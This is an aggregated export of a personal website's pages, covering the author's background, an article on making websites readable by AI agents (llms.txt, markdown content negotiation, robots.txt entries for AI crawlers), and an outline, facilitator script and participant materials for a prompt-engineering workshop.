# Joey Lopez — Knowledge Base
Generated: 2026-03-26T16:17:02.749163
Base URL: https://jrlopez.dev/
This file aggregates all public knowledge from jrlopez.dev.
Source: index.json (single source of truth)
---
---
# about.md
# https://jrlopez.dev/p/about.html
---
title: "About"
description: "CHSPE → community college → UC Irvine → data engineering → formal proofs via AI agents."
author: "Joey Lopez"
date: "2026-03-25"
tags: ["reference"]
atom_id: 25
source_html: "about.html"
url: "https://jrlopez.dev/p/about.html"
generated: true
---
# About

I passed the CHSPE at 16, did two years at community college, and transferred to UC Irvine for informatics. After graduating I spent five years in financial services data engineering — building pipelines, ETL systems, and the kind of infrastructure that runs silently until it breaks at 2am.

In 2025 I started experimenting with spec-driven AI workflows — giving language models structured specifications instead of open-ended prompts. The methodology worked well enough that I used it to produce a [formal proof]() that regex-based AI safety filters have an algebraic blind spot. I didn't write the proof by hand. I wrote the specification, built the agent pipeline, and the system generated a result that survived peer review. That changed how I think about what these tools are for.

Now I teach the methodology — how to treat prompts as programs, how to build dependency-ordered agent workflows, how to get reliable outputs from unreliable models. Everything on this site came from that same approach: research a problem, formalize the method, build the tooling, then teach it. The [Lattice-Driven Development]() page explains the framework. The [resume]() has the professional history.

[Book 15 min]()

Joey Lopez · 2026
---
# agent-first-design.md
# https://jrlopez.dev/p/agent-first-design.html
---
title: "Agent-First Website Design"
description: "Your website has two audiences now. One of them doesn't have eyes. Standards, patterns, implementation."
author: "Joey Lopez"
date: "2026-03-25"
tags: ["methodology", "code", "theory"]
atom_id: 26
source_html: "agent-first-design.html"
url: "https://jrlopez.dev/p/agent-first-design.html"
generated: true
---
# Agent-First Website Design

Your website has two audiences now. One of them doesn't have eyes.

March 2026

Every website built before 2024 was designed for one reader: a human with a browser. That assumption is now wrong. AI agents — coding assistants, research tools, search augmenters — are hitting your pages, and they're getting HTML soup when they need structured text. This isn't a future problem. GPTBot went from 5% to 30% of crawler traffic between May 2024 and May 2025. Over 560,000 sites now have AI-specific entries in their robots.txt. The agents are already here. The question is whether your site is legible to them.
## The Standards Landscape

Six competing standards have emerged in 18 months. None has won. Here's the field:
| Standard | What it does | Adoption |
| --- | --- | --- |
| llms.txt | Markdown site index at root, proposed by Jeremy Howard (fast.ai) | ~10K–844K sites (contested) |
| AGENTS.md | Project guidance for coding agents, donated to Linux Foundation | 60,000+ repos |
| Agent Web Protocol | JSON at /.well-known/agent.json declaring site capabilities | Early |
| Content negotiation | Accept: text/markdown → server returns markdown | Cloudflare + Vercel |
| IETF aipref | Formal extension to robots.txt for AI usage preferences | Draft RFC |
| Content Signals | Cloudflare's ai-train / ai-input / search in robots.txt | Cloudflare sites |
#### The uncomfortable truth

No LLM provider has confirmed their crawlers actually read llms.txt. Cloudflare's data showed **zero visits** from GPTBot, ClaudeBot, or PerplexityBot to llms.txt pages from August to October 2025. The supply side is building for demand that hasn't materialized in a standardized way.
## What Actually Works (March 2026)

If you strip away the standards politics, three things demonstrably help agents consume your content:
### 1. Content Negotiation

The most technically mature approach. An agent sends Accept: text/markdown, and your server returns clean markdown instead of HTML. Same URL, same content, different format. Cloudflare shipped this at the edge in February 2026 — HTML-to-markdown conversion with zero origin changes. Token reduction: **~80%** (16K tokens in HTML down to 3K in markdown). Vercel built it as Next.js middleware with 99.6% payload reduction.

If you're on Cloudflare, flip a switch. If you're on static hosting (GitHub Pages, Netlify), you can't do server-side negotiation. The fallback: serve companion .md files alongside your HTML and link them via a <link rel="alternate"> tag.
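The negotiation logic itself is small. A minimal sketch of the server-side check, assuming a plain Accept-header parse (not Cloudflare's or Vercel's actual implementation):

```python
# Minimal sketch of the server-side check for Accept-based content
# negotiation. Assumed logic, not Cloudflare's or Vercel's implementation.
def wants_markdown(accept_header: str) -> bool:
    """True if the client prefers text/markdown over text/html."""
    prefs = {}
    for part in accept_header.split(","):
        fields = part.strip().split(";")
        media = fields[0].strip()
        q = 1.0  # default quality per RFC 9110
        for param in fields[1:]:
            param = param.strip()
            if param.startswith("q="):
                try:
                    q = float(param[2:])
                except ValueError:
                    pass
        prefs[media] = q
    return prefs.get("text/markdown", 0.0) > prefs.get("text/html", 0.0)
```

A real handler would then serve the .md companion instead of the HTML page for the same route.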
### 2. Structured Discovery Files

Put these at your root:
```
/robots.txt — Who can crawl, AI-specific directives
/llms.txt — Curated site summary for LLMs (Markdown)
/sitemap.xml — Page discovery with dates
/index.json — Structured catalog (your schema)
```
Even if no crawler reads llms.txt today, it's cheap insurance. The file takes 30 minutes to write and it establishes a machine-readable entry point. When agents do start reading it — and they will, because the alternative is scraping — yours will be there.
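For reference, a hypothetical llms.txt in the llmstxt.org shape: an H1, a one-line blockquote summary, then annotated link lists. The entries below are illustrative, not this site's actual file.

```markdown
# Joey Lopez (jrlopez.dev)

> Personal site: spec-driven AI workflows, prompt engineering, agent-first web design.

## Pages

- [About](https://jrlopez.dev/p/about.md): Background and methodology
- [Agent-First Design](https://jrlopez.dev/p/agent-first-design.md): Standards, patterns, implementation
```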
### 3. Self-Describing Pages

Every page should carry enough metadata that an agent can understand it without external context:
- **JSON-LD structured data** — schema.org/TechArticle with title, description, author, date, keywords
- **Semantic <article> wrapper** — enables Readability.js / Jina Reader extraction
- **<link rel="alternate"> tag** — points to the .md companion
- **YAML frontmatter in .md files** — title, date, tags, source URL

An agent hitting any page on your site should be able to determine what it is, who wrote it, when, and what topics it covers — without fetching a separate index.
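As a concrete shape for the JSON-LD item, here's a schema.org/TechArticle block for a page like this one. Field values are assumed from the frontmatter above, not copied from the live site.

```json
{
  "@context": "https://schema.org",
  "@type": "TechArticle",
  "headline": "Agent-First Website Design",
  "description": "Standards, patterns, implementation.",
  "author": { "@type": "Person", "name": "Joey Lopez" },
  "datePublished": "2026-03-25",
  "keywords": "methodology, code, theory"
}
```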
## The Dual-Format Pattern

The architecture I landed on for this site:
```
index.json ← single source of truth (atom catalog)
index.html ← fetches index.json, renders for humans
p/topic.html ← rich interactive page (hand-authored)
p/topic.md ← companion markdown (auto-generated by forge.py)
llms.txt ← curated index for LLMs
llms-full.txt ← concatenated content from all .md files
sitemap.xml ← rebuilt from index.json
robots.txt ← AI crawler permissions
```
The HTML pages are the source of truth — rich, styled, interactive. The .md files are generated derivatives. A build script (forge.py, ~300 lines, Python stdlib only) extracts content from HTML and generates everything else. A pre-commit hook runs the build + 13 BDD validation scenarios before every commit.

The key insight: **your HTML is the product. The agent layer wraps it, never rewrites it.** Don't adopt a static site generator to retrofit markdown-source onto working pages. Don't maintain two copies by hand. Generate the agent-readable format from the human-readable format, automatically.
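To make the generate-don't-hand-maintain step concrete, here is a minimal sketch of the extraction half of such a build script, using only the Python stdlib. This is not forge.py itself, and the <article> wrapper is an assumption based on the semantic-wrapper convention described above.

```python
# Sketch of the HTML -> .md extraction step such a build script performs.
# NOT forge.py itself; assumes content lives in an <article> wrapper,
# per the semantic-wrapper convention above. Python stdlib only.
import re
from html.parser import HTMLParser

class ArticleText(HTMLParser):
    """Collect the text inside the first <article> element."""
    def __init__(self):
        super().__init__()
        self.depth = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag == "article":
            self.depth += 1

    def handle_endtag(self, tag):
        if tag == "article" and self.depth:
            self.depth -= 1

    def handle_data(self, data):
        if self.depth:  # only keep text inside <article>
            self.chunks.append(data)

def article_text(html: str) -> str:
    parser = ArticleText()
    parser.feed(html)
    return re.sub(r"\s+", " ", " ".join(parser.chunks)).strip()
```

A full build step would wrap this output in YAML frontmatter and write the .md companion next to each page.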
## The Robots.txt Problem

AI crawlers are fragmenting. Both OpenAI and Anthropic now operate three bots each:
| Provider | Training | Search | User-initiated |
| --- | --- | --- | --- |
| OpenAI | GPTBot | OAI-SearchBot | ChatGPT-User |
| Anthropic | ClaudeBot | Claude-SearchBot | Claude-User |
This lets you block training while allowing search and agentic use. But it also means your robots.txt is getting complex, and compliance is unverifiable — Perplexity was caught using undeclared crawlers with generic user-agent strings to bypass blocking directives.

The IETF's aipref working group (chartered January 2025) is building a formal extension to the Robots Exclusion Protocol with three usage categories: ai-train, ai-input (RAG/agentic), and search. Cloudflare's Content Signals is the draft implementation. Neither is enforceable — they're preference declarations, not access control.
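Put together, a robots.txt using the bot names from the table above might look like this. Illustrative only; as noted, compliance is a preference, not access control.

```txt
# Block training crawlers
User-agent: GPTBot
Disallow: /

User-agent: ClaudeBot
Disallow: /

# Allow search and user-initiated agents
User-agent: OAI-SearchBot
Allow: /

User-agent: ChatGPT-User
Allow: /

User-agent: Claude-SearchBot
Allow: /

User-agent: Claude-User
Allow: /
```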
## What's Coming

Predictions, ordered by confidence:
- **Content negotiation wins.** Accept: text/markdown uses existing HTTP infrastructure, requires no new file formats, and Cloudflare's edge conversion removes the adoption barrier. This will be the default way agents read the web.
- **IETF aipref becomes the new robots.txt. **The three-signal model (train/input/search) will be an RFC within 18 months. Cloudflare's Content Signals is the implementation.
- **llms.txt becomes niche. **Useful for documentation sites, but eclipsed by content negotiation which works on every page.
- **The trust problem gets worse. **Without cryptographic agent identity, publishers will block aggressively, pushing agents toward browser automation — the opposite of the cooperative vision.
## Implementation Checklist

If you're building or maintaining a website today, do these in order:
- **Wrap content in <article> tags** — one-line edit per page, enables reader-mode extraction
- **Add JSON-LD structured data** — schema.org/Article with title, description, date, author
- **Write a robots.txt** with AI crawler directives — allow what you're comfortable with
- **Write an llms.txt** — curated markdown summary of your site's content
- **Generate .md companions** for your HTML pages — link via <link rel="alternate">
- **If on Cloudflare: **enable Markdown for Agents (one toggle)
- **If self-hosting:** build a script to generate agent-readable formats from your HTML

Total effort for a 20-page static site: one afternoon. This site is the reference implementation — [llms.txt](), [index.json](), and every page has a [.md companion]().
## Sources
- [llmstxt.org]() — The /llms.txt spec (Jeremy Howard, fast.ai)
- [Cloudflare: Markdown for Agents]() — Edge-level content negotiation (Feb 2026)
- [Checkly: State of AI Agent Content Negotiation]() — Which agents actually negotiate
- [Vercel: Agent-Friendly Pages]() — Middleware implementation
- [IETF aipref Working Group]() — Formal robots.txt extension
- [Content Signals]() — Cloudflare's ai-train/ai-input/search spec
- [Agent Web Protocol]() — Action-discovery standard
- [Cloudflare: Who's Crawling Your Site]() — GPTBot 5%→30% traffic surge
- [Linux Foundation: AAIF + AGENTS.md]()
---
# ai-learning-hub.md
# https://jrlopez.dev/p/ai-learning-hub.html
---
title: "AI Learning Hub"
description: "Guided path: why AI → tools → patterns → pick your track."
author: "Joey Lopez"
date: "2026-03-22"
tags: ["prompting", "teaching"]
atom_id: 6
source_html: "ai-learning-hub.html"
url: "https://jrlopez.dev/p/ai-learning-hub.html"
generated: true
---
# AI Learning Hub

Context is everything. Structure gets rewarded. You are the retrieval system.

Joey Lopez · Sr. Data Engineer

4 tracks · 5 skills · 90 min live + self-paced · maintained 2026
## Four steps, then you're off

Whether you're brand new or have been prompting for a year, this path covers the foundation before branching into role-specific work.

#### 01 · Why AI?

What it actually does well, what changes for your role, and why prompting is closer to programming than talking. [read it here]()

#### 02 · Pick Your Tool

Chat assistant, code completion, AI-native editor, or agentic IDE — don't overthink it, but know the difference. [tool landscape]()

#### 03 · Learn the Patterns

Zero-shot, few-shot, chain-of-thought, ReAct, Tree of Thoughts — foundations and advanced patterns, with a second brain framework. [prompting patterns]()

#### 04 · Pick Your Role Track

Dev, PO/PM, Delivery Lead, Tech Lead, or capstone. Role-specific workflows built on the same underlying patterns. [choose a track]()

## Before you learn the patterns, orient yourself

Three things worth internalizing before you touch a prompt library or install a tool.

### What AI actually does well
#### The tasks where it earns its keep
- Drafting first passes on anything text-shaped (emails, docs, PRDs, summaries)
- Transforming content — reformatting, translating register, restructuring arguments
- Recognizing patterns in messy inputs (logs, feedback, transcripts)
- Writing boilerplate and scaffolding you'd otherwise copy-paste
- Rubber-ducking your own thinking — externalizing and stress-testing ideas

### What changes for your role

#### The same tool, different leverage points

- **Developer** — Specs and test cases arrive faster than code. The bottleneck shifts to review and integration, not generation.
- **PO / PM** — User stories with Given/When/Then, sprint backlogs, and roadmap rationales in seconds instead of hours.
- **Delivery Lead** — Risk matrices, status reports, and onboarding plans generated from your notes — you edit, not author.
- **Tech Lead** — Run parallel architecture evaluations, generate ADRs via Tree of Thoughts, and build metaprompts that amplify your whole team.

### The mental model shift

#### Prompting is programming

A prompt isn't a request. It's a program. The same engineering principles that make code maintainable make prompts effective.

| In code | In a prompt | Why it matters |
| --- | --- | --- |
| Database | Context | What you include determines what the model can retrieve |
| Schema | Structure | Format and constraints shape the output space |
| Query / retrieval | You | You decide what enters the context — that is the skill |
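The mapping can be made literal. A hypothetical helper (not part of any tool mentioned here) that assembles a prompt the way you'd assemble a program, with context, structure, and selection as explicit parameters:

```python
# Hypothetical helper (not from any tool mentioned here): assemble a
# prompt like a program, with context, structure, and selection explicit.
def build_prompt(persona: str, context: list[str], output_format: str, task: str) -> str:
    sections = [
        f"You are {persona}.",             # persona: the "runtime environment"
        "Context:",                        # context: what the model can "retrieve"
        *[f"- {item}" for item in context],
        f"Respond in this format: {output_format}",  # structure: the output schema
        f"Task: {task}",
    ]
    return "\n".join(sections)
```

You, the caller, decide what goes into `context`; that selection step is the skill the table describes.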
## Four categories of AI tooling

Most people start with whatever's available and upgrade when they hit a ceiling. That's the right move. Here's what the categories actually mean.
| | Chat Assistant | Code Completion | AI-Native Editor | Agentic IDE |
| --- | --- | --- | --- | --- |
| What it is | Conversational interface for open-ended prompting (e.g. ChatGPT, Claude.ai, Copilot Chat) | Inline suggestions as you type, trained on code (e.g. GitHub Copilot, Tabnine, Codeium) | Editor with deep AI integration — inline editing, codebase awareness (e.g. Cursor, Windsurf) | Agent that reads, edits, and runs code autonomously across files (e.g. Claude Code, Devin, Copilot Workspace) |
| Best for | Drafting, explaining, brainstorming, non-code tasks | Speeding up typing in familiar codebases; boilerplate | Refactoring, multi-file edits, test generation, codebase Q&A | Large refactors, new features with specs, automated review loops (highest leverage) |
| Primary users | Everyone — all roles benefit | Developers (and technically-minded POs/TLs) | Developers who want more than autocomplete | Senior devs and tech leads comfortable giving AI significant scope |
| Context window | Single conversation; loses context across sessions | Current file + a few nearby files | Whole codebase via embeddings or selection (significant upgrade) | Repo-wide; can run commands, read logs, write tests (maximum scope) |
| Learning curve | Low — natural language interface (start here) | Low-medium — mostly passive until you learn to steer it (start here) | Medium — new prompting patterns, composer mode, rules files | High — requires spec discipline and trust calibration (graduate when ready) |
| When to start | Day one — use it for anything you'd Google | Week one if you write code regularly | When you're writing AI-assisted features or doing large refactors | When you can write a spec that an agent can execute without babysitting |
Don't overthink tool choice. Start with what's available, graduate when you hit limits.
## Five role-specific skill files

Each track is a complete, production-relevant workflow — not a tutorial. You get a skill file you can actually run.

#### 💻 Developer Second Brain

ReAct-driven migrations, refactoring, feature implementation, and systematic debugging with annotated diffs.

#### 📊 PO/PM Second Brain

User stories with Given/When/Then, sprint backlogs, roadmap prioritization, and executive reporting.

#### 📋 Delivery Lead Second Brain

ABCD priority building, risk matrices, client status reports, and phased onboarding — all system-ready.

#### 🏗️ Tech Lead Second Brain

ADRs via Tree of Thoughts, metaprompts for team amplification, spike plans, and .cursorrules generation.

#### 🔨 Make Skills (Capstone)

Turn any repeated weekly task into a structured skill file. Discover, extract the pattern, generate. Every skill is a RAG system.
## Materials for the live workshop

Self-study first, then the live sessions, then keep the reference cards close.

#### 📋 Common Knowledge

15-minute self-study. Complete before the live session to align on foundational concepts and vocabulary. [Prereq materials]()

#### 🎤 Session 1 — Patterns & Priority Builder

60 min. Three Approaches Framework, foundational patterns, and a hands-on priority builder exercise. [Session 1]()

#### 🎯 Session 2 — Advanced Patterns & Interview Prep

60 min. ReAct, Tree of Thoughts, and a complete interview preparation workflow using spec-kit methodology. [Session 2]()

#### ⚡ Quick Reference Cards

Pattern recognition guide and decision tree for rapid lookup during practice. Printable and screen-friendly. [Quick reference]()
## When you want more than the workshop covers

#### Advanced Patterns

Self-consistency, constitutional AI, chain-of-density, structured generation, and evaluation loops. [prompting-advanced]()

#### Prompt Cheat Sheet

Composition patterns, operator reference, and the scaffolding primitives behind every skill file. [cheat sheet]()

#### Diagrams as Prompts

Using Mermaid diagrams as structured reasoning inputs. Why pictures beat paragraphs for complex specs. [mermaid prompts]()

#### Lattice-Driven Dev

Dependency-ordered development methodology. Build L1 before L2, verify before shipping each layer. [lattice dev]()
## For facilitators

Session structure, timing, and materials for running the live workshop.

### Session flow — 105 min total

| Time | Segment | Description |
| --- | --- | --- |
| 15 min | Prereq | Self-study before the call |
| 15 min | Activation | Framing & three intuitions |
| 40 min | Role Fork | Role-specific deep dive with skill file |
| 20 min | Capstone | Build your own skill |
| 10 min | Close | Synthesis & next steps |

#### 📚 Facilitator Guide v2

Minute-by-minute script, timing notes, failure modes, and contingency plans for delivery. [Facilitator guide]()

#### 👥 Participant Materials

Decision matrices, demo personas, spec-kit templates, and workshop completion checklist. [Participant materials]()
### v2 improvements
- **Faster** — 90 min instead of 120 (still covers more ground)
- **Role-specific** — four parallel tracks instead of one generic path
- **Agency** — participants build their own skill file in the capstone
- **Lower entry friction** — 15-min prereq removes baseline alignment overhead from live time
- **Production-grounded** — examples drawn from real project patterns, not textbook exercises
---
# bootcamp-facilitator.md
# https://jrlopez.dev/p/bootcamp-facilitator.html
---
title: "Facilitator Guide"
description: "Minute-by-minute script for running the workshop."
author: "Joey Lopez"
date: "2026-01-18"
tags: ["prompting", "teaching"]
atom_id: 12
source_html: "bootcamp-facilitator.html"
url: "https://jrlopez.dev/p/bootcamp-facilitator.html"
generated: true
---
# Facilitator Guide

Minute-by-minute timing, file usage, and coaching notes for professional workshop delivery

Joey Lopez · Prompt Engineering Bootcamp · Internal use
## Pre-Session 1 Setup (15 minutes before start)
- Demo persona descriptions open and ready to share screen (3 personas visible)
- Priority Builder Agent prompt (325 lines) copied to clipboard for AI tool demo
- Session 1 slides opened and tested (diagrams displaying correctly)
- AI tool open — ChatGPT or Claude with a fresh session
- Quick reference cards available for participants (print or digital)

## Session 1: Industry Standards (60 minutes)

### 0–5 min: Problem & Solution Overview

#### Materials

None — pure presentation. Energy check.

0:00 — Welcome, energy check, agenda overview
0:02 — "How many use AI tools daily?" (show of hands)
0:03 — Show problem slide: "Let's see if this sounds familiar..."
0:04 — Build energy: "Today you'll learn systematic approaches"
0:05 — Transition: "First, let me show you three valid approaches"

**Goal:** High energy, validate pain points. Don't solve the problem yet.

### 5–15 min: Three Approaches Framework

#### Materials

Three Approaches diagram on screen.

5:00 — Show Three Approaches diagram
5:01 — Green path: "Most teams start here — ADRs + Config"
5:03 — Orange path: "Learning teams benefit from Structured"
5:05 — Yellow path: "Platform-committed teams use Tool-Assisted"
5:07 — Hands: "Who uses multiple AI tools?" → Point to green
5:09 — Hands: "Who wants to learn systematic prompting?" → Point to orange
5:11 — Hands: "Who's committed to one IDE like Cursor/Windsurf?" → Yellow
5:13 — Key insight: "All valid — choose based on team context"
5:15 — Transition: "Before we try this, let's see the foundational patterns"

**Interaction:** Point, trace paths, ask team context questions. Don't rush.

### 15–20 min: Foundational Patterns

#### Materials

Foundational Patterns diagram. Preview priority-builder prompt (mention it uses all 4 patterns).

15:00 — Show Foundational Patterns diagram
15:01 — Trace flow: "Persona establishes expertise..."
15:02 — "Few-shot shows desired format..."
15:03 — "Template structures the output..."
15:04 — "Chain-of-Thought reveals reasoning..."
15:05 — Quick interaction: "Where have you seen these before?"
16:00 — "In 5 minutes, you'll see all 4 patterns in a 325-line system"
17:30 — Transition slide to hands-on

### 20–25 min: Demo: Priority Builder
#### Critical File Sequence
- Open demo personas on screen — show "Option B: Tech Lead"
- Switch to AI tool with Priority Builder prompt pasted
- Point out pattern locations: "Lines 1–4 are Persona, lines 200–220 Few-shot..."
- Start 20 Questions — let AI ask 3–4 questions
- Answer as Tech Lead persona: "AI/ML specialist, banking automation..."
- Generate output — show CSV + formatted versions

20:00 — "I'll demo using a safe practice persona"
20:30 — OPEN persona descriptions on screen
21:00 — Point to Tech Lead: "5 years, AI/ML specialist, current projects..."
22:00 — "Now watch all 4 patterns in action"
22:15 — SWITCH to AI tool with prompt loaded
23:00 — Start 20 Questions, answer as Tech Lead
24:00 — Generate output: show CSV + formatted versions
24:30 — "Notice systematic vs ad-hoc difference"
25:00 — Transition: "Your turn — start with freestyle"
- Participants see clear persona usage
- AI generates realistic CSV output
- All 4 patterns demonstrated and named
- Systematic vs ad-hoc contrast is obvious

### 25–35 min: Exercise: Freestyle First

#### Materials

Demo persona descriptions on screen for participant reference.

25:00 — "Choose a DIFFERENT persona from the demo"
25:30 — Show personas on screen again
26:00 — "Create 1 priority using your normal prompting approach"
26:30 — Circulate, observe struggles
27:00 — Coach lightly: "What metrics could you include?"
29:00 — Watch for pain points: vague results, generic language
30:00 — "2 more minutes"
32:00 — Quick debrief: "How many got output you'd submit to a manager?"
33:00 — "Most struggled with specificity — let's try systematic approach"
35:00 — Transition: "Now use Priority Builder methodology"
#### Coaching note

Don't help too much during freestyle. Let them feel the pain. Take mental notes of specific struggles for the debrief — the contrast will land harder.

### 35–50 min: Exercise: Priority Builder Template
#### Critical File Sequence
- Participants copy/paste Priority Builder prompt into their AI tool
- Switch to different persona than freestyle round
- Guide through 20 Questions process 35:00 — "Everyone load the Priority Builder prompt"
35:30 — Verify: "Can you see the full 325-line prompt?"
36:00 — "Pick DIFFERENT persona from freestyle round"
36:30 — Walk around: ensure prompt loaded correctly (common paste issues)
37:00 — "Let the AI ask you questions — answer as your persona"
37:30 — Coach: "Be specific about projects and metrics"
40:00 — Watch for systematic vs ad-hoc differences emerging
42:00 — "Generate your priority — pick Conservative, Balanced, or Aspirational"
44:00 — "Anyone getting CSV output? That's ready for submission"
46:00 — Celebrate: "Show of hands who got specific metrics"
48:00 — Quick sharing: "What's one metric you wouldn't have thought of?"
50:00 — Transition: "Let's compare the three approaches"

**Heavy coaching required here.** Ensure prompts load, guide specific persona-based answers, celebrate systematic outputs vs earlier freestyle struggles.

### 50–55 min: Compare: Three Approaches

50:00 — "Same Spring migration, 3 different approaches"
50:30 — Show ADRs approach: simple prompt referencing standards doc
51:00 — Show Structured approach: multi-file systematic workflow
52:00 — Show Tool-Assisted: Windsurf 290-line cascade
53:00 — "Notice: same result, different maintenance overhead"
54:00 — Quick poll: "Which fits your team's style?"
55:00 — Transition to insights

### 55–60 min: Insights & Session 2 Preview

55:00 — "What did you observe? Freestyle vs Priority Builder?"
55:30 — Capture insights: "Systematic = specific, ad-hoc = generic"
56:00 — "For Session 2: same patterns for interview prep"
56:30 — Preview job descriptions: "4 realistic senior roles available"
57:00 — "Bring: chosen job + same persona for continuity"
58:00 — Session 2 preview: "ReAct + Tree of Thoughts in action"
59:00 — "Questions before 5-minute break?"
60:00 — End Session 1
## Pre-Session 2 Setup
- Job descriptions (4 options) open and visible
- Demo persona descriptions — same personas from Session 1
- Interview prep 4-file workflow templates ready
- Spring migration files loaded for live Java demo
- Session 2 slides tested

## Session 2: Advanced Patterns (60 minutes)

### 0–5 min: Recap + Advanced Patterns Overview

0:00 — "Session 1 quick wins — who got CSV output?"
0:30 — "Today: same patterns for complex reasoning"
1:00 — Energy check: "Ready to level up?"
2:00 — "Advanced patterns: ReAct + Tree of Thoughts + live Java demo"
3:00 — "Goal: systematic methodology across ALL domains"
5:00 — Ready for advanced patterns

### 5–15 min: Spec-Kit + ReAct + Tree of Thoughts

5:00 — Show Spec-Kit diagram
5:30 — Point to knowledge-base: "Reusable domain expertise"
6:00 — Point to specification: "This task's specific requirements"
7:00 — Point to implementation-plan: "Where ReAct + Tree of Thoughts live"
8:00 — "Key advantage: separation of concerns"
10:00 — Show ReAct + Tree diagram
10:30 — Trace ReAct flow: "Think → Act → Observe"
11:00 — Show Tree of Thoughts: "Generate → Evaluate → Choose"
12:30 — Interactive: "How would you analyze job requirements?"
15:00 — Transition: hands-on time

### 15–25 min: Demo: Interview Prep Workflow
#### Critical File Sequence
- Open job descriptions — show "Senior Manager AI Strategy" role
- Use same Tech Lead persona from Session 1
- Load interview prep 4-file workflow live

15:00 — "Interview prep using same Tech Lead persona from priorities"
15:30 — OPEN job descriptions, show Senior Manager AI Strategy role
16:00 — "Notice: 8+ years experience, $5M budget, C-level presentations"
16:30 — "Our Tech Lead: 5 years, AI specialist, no big budget experience"
17:00 — "Watch systematic gap analysis"
18:00 — Live spec creation: role details + background analysis
19:00 — Execute ReAct: "Think: Gap in budget management experience"
19:30 — "Act: Position as technical depth with business impact"
20:00 — "Observe: Need evidence of strategic thinking"
20:30 — Tree of Thoughts: 3 strategies: Technical Expert, Strategic Leader, Bridge
21:30 — Choose strategy: "Bridge Role — technical depth + business growth"
22:00 — Generate materials: positioning statement + STAR examples
23:00 — "Notice: systematic vs random interview prep"
25:00 — Transition to exercise
- Clear job analysis demonstrated
- ReAct pattern execution visible and named
- Tree of Thoughts evaluation shown with explicit tradeoffs
- Systematic positioning strategy emerges visibly

### 25–40 min: Exercise: Build Interview Strategy

#### File Coordination

Participants pick a different job than the demo. Use the same persona from Session 1 priorities.

25:00 — "Everyone open job descriptions"
25:30 — "Pick DIFFERENT job than AI Strategy demo"
26:00 — "Options: Banking Consultant, Retail Director"
26:30 — "Use SAME persona from Session 1 for continuity"
27:00 — "Phase 1: Create specification.md"
27:30 — Coach: "Document job requirements vs your persona background"
28:00 — "What's the biggest gap?"
30:00 — "Phase 2: ReAct analysis"
30:30 — Guide: "THINK about positioning options"
31:00 — "ACT: Map specific experience to requirements"
31:30 — "OBSERVE: What positioning emerges?"
32:00 — "Tree of Thoughts: generate 3 positioning strategies"
33:00 — Coach: "What are pros/cons of each?"
34:00 — "Which has lowest risk?"
35:00 — "Generate positioning statement + 2 STAR examples"
38:00 — Celebrate: "Who has clear positioning strategy?"
40:00 — Transition: "Same patterns in technical work"
#### Intensive coaching required
- Guide explicit ReAct structure — many participants skip steps
- Force specific evidence for positioning claims, not assertions
- Help evaluate tradeoffs between strategies explicitly
- Ensure STAR examples are specific, not generic

### 40–55 min: Live Java Demo: Spring Migration

#### Materials

Screen share Spring migration repository. Cross-Domain Patterns diagram.

40:00 — "Same systematic patterns for technical work"
40:30 — Show Cross-Domain diagram: "Universal patterns across domains"
41:00 — SCREEN SHARE Spring migration files
41:30 — "Three approaches to same migration challenge"
42:00 — Show ADRs approach: .github/copilot-instructions.md
42:30 — "Simple prompt: 'Follow migration standards, update UserController'"
43:00 — Show Structured approach: spec/ folder workflow
44:30 — Execute live: Load files in AI tool, generate migrated code
46:00 — Point out ReAct: "Think dependencies → Act on imports → Observe compile"
47:00 — Show Tool-Assisted: Windsurf 290-line cascade
48:00 — "Built-in systematic validation at each step"
49:30 — "Same patterns: priorities → interviews → code"
51:00 — "ReAct works everywhere: Think → Act → Observe"
53:00 — Interactive: "Where else could you apply these patterns?"
55:00 — Transition to wrap-up
- Clear pattern recognition across domains visible
- Live code generation working in real time
- "Aha moment" — universal patterns click for participants

### 55–60 min: Integration + Next Steps

55:00 — "What patterns did you recognize across domains?"
55:30 — Capture: "Same ReAct, different applications"
56:00 — "This week: apply ReAct to one work decision"
56:30 — "Use Tree of Thoughts for next strategic choice"
57:30 — Show quick reference cards: "Take this for ongoing use"
58:00 — "Goal achieved: systematic vs ad-hoc methodology"
58:30 — "Questions? Discussion? Applications?"
60:00 — End workshop
## Workshop Success Metrics
#### Session 1
- 80%+ generate CSV-ready priorities
- Clear systematic vs ad-hoc recognition
- Proper persona usage throughout
- Understanding of Three Approaches decision framework
#### Session 2
- ReAct analysis executed properly (steps named)
- Tree of Thoughts with explicit tradeoff rationale
- Pattern recognition across business + technical domains
- Confidence applying methodology to their own work
#### Overall
- Real deliverables created (priorities + interview materials)
- Systematic methodology internalized
- Cross-domain pattern recognition achieved
- Concrete action plans for ongoing application
---
# bootcamp-prereq.md
# https://jrlopez.dev/p/bootcamp-prereq.html
---
title: "Bootcamp Prereq"
description: "15-minute self-study before the live session."
author: "Joey Lopez"
date: "2026-01-10"
tags: ["prompting", "teaching", "reference"]
atom_id: 8
source_html: "bootcamp-prereq.html"
url: "https://jrlopez.dev/p/bootcamp-prereq.html"
generated: true
---
[← home ]()[bootcamp ]()[decision matrix ]()[personas ]()[templates ]()[checklist ]()
# Participant Materials
Reference cards, demo personas, and workflow templates for the Prompt Engineering Bootcamp
Joey Lopez · Prompt Engineering Bootcamp

Frameworks
## Three Approaches Decision Matrix
| When to Use | ADRs + Config | Structured Files | Tool-Assisted |
|---|---|---|---|
| **Team Size** | Any size | 5–15 people | Committed to one tool |
| **Task Type** | Simple–Medium | Complex, repeated | IDE-integrated work |
| **Maturity** | Proven (Tier 1) | Experimental (Tier 3) | Varies (Tier 2–3) |
| **Maintenance** | Low | Medium | Low (tool manages) |
| **Examples** | .github/copilot-instructions.md | Priority Builder (325 lines) | Windsurf workflows |
| **Time to Setup** | 15 minutes | 1–2 hours | 30 minutes |
| **Best For** | Most teams | Learning, complex tasks | Platform-specific teams |
## Foundational Patterns Reference
| Pattern | Template | When to Use |
|---|---|---|
| **Persona** | "You are an expert [role] with [expertise]..." | Need specialized knowledge |
| **Few-shot** | "Example 1: Input → Output" | Want consistent format |
| **Template** | "Respond in this format: [structure]" | Need structured output |
| **Chain-of-Thought** | "Show your reasoning step by step" | Complex problem solving |
## Advanced Patterns Reference
| Pattern | Structure | When to Use |
|---|---|---|
| **ReAct** | Think → Act → Observe → Think... | Multi-step tasks with validation |
| **Tree of Thoughts** | Generate options → Evaluate → Choose | Decision points with tradeoffs |
| **Spec-Kit** | knowledge-base → specification → implementation | Complex, repeated tasks |
Practice Material
## Demo Personas for Safe Practice
Use these fictional profiles during exercises to avoid putting real client or personal information into AI tools.
#### Persona A — Delivery Lead, Financial Services
- **Experience:** 8 years, manages 12-person team
- **Current Project:** Digital transformation for regional bank ($2.3M, 18 months)
